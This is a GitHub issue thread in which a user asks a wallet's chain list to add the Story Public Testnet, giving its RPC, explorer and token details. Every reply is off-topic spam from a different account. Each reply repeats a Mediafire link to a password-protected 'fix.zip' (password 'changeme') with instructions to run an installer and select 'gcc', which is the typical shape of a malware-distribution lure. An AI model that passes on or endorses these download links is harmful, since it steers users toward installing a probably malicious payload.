### ISSUE TITLE
[Story Protocol] Add support for Story Public Testnet

### ISSUE THREAD

**Issue by Mabel-Nguyen** [Koniverse/SubWallet-ChainList#294]
**If this is your first time integrating, the following information is required**

- A short introduction about your project/ your team: Story is the World’s IP Blockchain, onramping Programmable IP to power the next generation of AI, DeFi, and consumer applications.
- Document: https://docs.story.foundation/docs/what-is-story
- Social media links ([discord](https://discord.com/invite/storyprotocol), [website](https://www.story.foundation/))
- Github: https://github.com/storyprotocol

**If you want to integrate a chain, you would need to provide**

- Name of the blockchain: Story Public Testnet
- Type of the blockchain: EVM
- Blockchain providers: https://testnet.storyrpc.io/
- Metadata of the blockchain: https://docs.story.foundation/docs/wallet-setup
- Logo of the blockchain: https://www.figma.com/design/z9s6aLTLoUdjMwoXLyWcPz/01.SubWallet-Project-Logo?node-id=7234-80&t=2QKf6S9kuqdgdZJj-4
- Block explorers: https://testnet.storyscan.xyz/
- Token: IP (Story)

**Comment by PiaoR** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Evul88** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Satyam1Deepu** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by bkballoon** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by NEKO-JOJUK** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by LC-JiaZhaorong** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."
